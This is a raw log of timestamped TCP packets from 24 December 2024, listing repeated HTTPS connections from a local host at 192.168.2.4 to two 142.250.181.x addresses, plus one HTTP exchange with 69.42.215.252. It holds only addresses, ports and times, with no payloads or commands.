                                                                                        Dec 24, 2024 22:11:38.737376928 CET44349823142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:38.737446070 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:38.737867117 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:38.737915039 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:38.737925053 CET44349822142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:38.738152027 CET44349822142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:38.738200903 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:38.738529921 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:38.783329010 CET44349823142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:38.783330917 CET44349822142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.633533001 CET44349823142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.634042025 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.634052992 CET44349823142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.634293079 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.634428024 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.634452105 CET44349823142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.634490013 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.635080099 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:39.635094881 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.635111094 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.635188103 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.635273933 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:39.635284901 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.635575056 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.635622025 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.635727882 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:39.635742903 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.644258022 CET44349822142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.645540953 CET44349822142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.645649910 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.645802975 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.645822048 CET44349822142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.645842075 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.645914078 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.646233082 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.646248102 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.646306992 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.646500111 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:39.646511078 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.646790981 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:39.646797895 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:39.646853924 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:39.647182941 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:39.647190094 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:40.208286047 CET804974069.42.215.252192.168.2.4
                                                                                        Dec 24, 2024 22:11:40.208355904 CET4974080192.168.2.469.42.215.252
                                                                                        Dec 24, 2024 22:11:41.345742941 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.345809937 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:41.348891020 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:41.348905087 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.349119902 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.349169016 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:41.349587917 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:41.352122068 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.352200985 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.352845907 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.352909088 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.355921984 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.355945110 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.356190920 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.356259108 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.356586933 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.365993023 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.366055012 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.366722107 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.366767883 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.368065119 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.368072033 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.368293047 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.368349075 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.368650913 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:41.371838093 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.371911049 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:41.373079062 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:41.373083115 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.374103069 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.374170065 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:41.374454975 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:41.395338058 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.399353027 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.411333084 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:41.419372082 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.324616909 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.324656963 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.324692011 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.324718952 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.324749947 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.324911118 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.324934959 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.328115940 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.328934908 CET49828443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.328949928 CET44349828142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.368796110 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.368901968 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.368913889 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.368957996 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.369473934 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.369476080 CET49834443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.369504929 CET44349829142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.369518042 CET44349834142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.369585991 CET49829443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.369586945 CET49834443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.370309114 CET49834443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.370325089 CET44349834142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.372107029 CET49835443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.372113943 CET44349835142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.374306917 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.374387026 CET49835443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.374391079 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.374408960 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.374618053 CET49835443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.374627113 CET44349835142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.374660969 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.374773026 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.375390053 CET44349827142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.375425100 CET49836443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.375463009 CET44349836142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.375503063 CET49827443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.376050949 CET49836443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.379971027 CET49836443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.379988909 CET44349836142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.393459082 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.393502951 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.393527985 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.393536091 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.393562078 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.393608093 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.393663883 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.393707991 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.393752098 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.394095898 CET49830443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.394102097 CET44349830142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.394493103 CET49837443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.394505024 CET44349837142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.394598007 CET49837443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.394741058 CET49837443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.394754887 CET44349837142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.726691008 CET49834443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.726785898 CET49835443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.726807117 CET49836443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.726824999 CET49837443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:42.727835894 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.727854013 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.727910995 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.728879929 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.728894949 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.731446981 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.731479883 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:42.731534958 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.731750011 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:42.731759071 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.422729015 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.422914028 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.423496008 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.423547983 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.426050901 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.426135063 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.426412106 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.426423073 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.426686049 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.426794052 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.426851034 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.426852942 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.427186966 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.428107977 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.428112984 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.428324938 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.431992054 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.432315111 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:44.467365980 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.479334116 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.332412004 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.332483053 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.332504988 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.332556963 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.332607985 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.332650900 CET44349838142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.332678080 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.332709074 CET49838443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.333079100 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.333111048 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.333137989 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:45.333144903 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.333168030 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.333194971 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:45.333354950 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.333365917 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.333477020 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:45.333484888 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.338716030 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.338772058 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.338788986 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.338829041 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.338865042 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.338888884 CET44349839142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.338926077 CET49839443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.339215040 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.339221954 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.339268923 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.339277983 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:45.339344025 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.339406967 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:45.339417934 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:45.339425087 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:45.339634895 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:45.339665890 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.078428030 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.078488111 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.078696966 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.078746080 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.078749895 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.078793049 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.079299927 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.079304934 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.079679012 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.079740047 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.083601952 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.083607912 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.085499048 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.085504055 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.086148977 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.086152077 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.087794065 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.087805033 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.088085890 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.088128090 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.089422941 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.090109110 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.090158939 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.090379953 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.090426922 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.091207027 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.131334066 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.131361961 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.095662117 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.096132994 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096157074 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.096328020 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096406937 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096455097 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.096674919 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.096736908 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096751928 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096878052 CET49848443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096982956 CET44349848142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.097059965 CET49848443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.097265005 CET49848443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.097306013 CET44349848142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.107784986 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.108001947 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108009100 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.108043909 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108177900 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108207941 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.108361959 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.108407021 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108414888 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108581066 CET49849443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108614922 CET44349849142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.112116098 CET49849443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.112344980 CET49849443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.112356901 CET44349849142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.131920099 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.131961107 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.132009983 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132018089 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.132164001 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132164001 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132174015 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.132220030 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.132255077 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132626057 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132636070 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.133001089 CET49850443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.133013964 CET44349850142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.133187056 CET49850443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.133393049 CET49850443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.133399010 CET44349850142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399121046 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399177074 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399190903 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.399229050 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399302959 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399346113 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.399346113 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.399885893 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.399915934 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.400281906 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.400326014 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.400424004 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.400671005 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.400701046 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.413985014 CET49848443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.414144993 CET49850443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.414144993 CET49849443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.414942980 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.414983988 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.415045023 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.415719032 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.415730953 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.416311979 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.416374922 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.417071104 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.417396069 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.417424917 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.132446051 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.132575989 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:50.133310080 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:50.133352041 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.134870052 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:50.134882927 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.148345947 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.148458958 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.148766041 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.148955107 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.149111032 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.149166107 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.149530888 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.149632931 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152070999 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152081013 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.152313948 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.152384996 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152698994 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152801037 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152828932 CET44349853142.250.181.14192.168.2.4
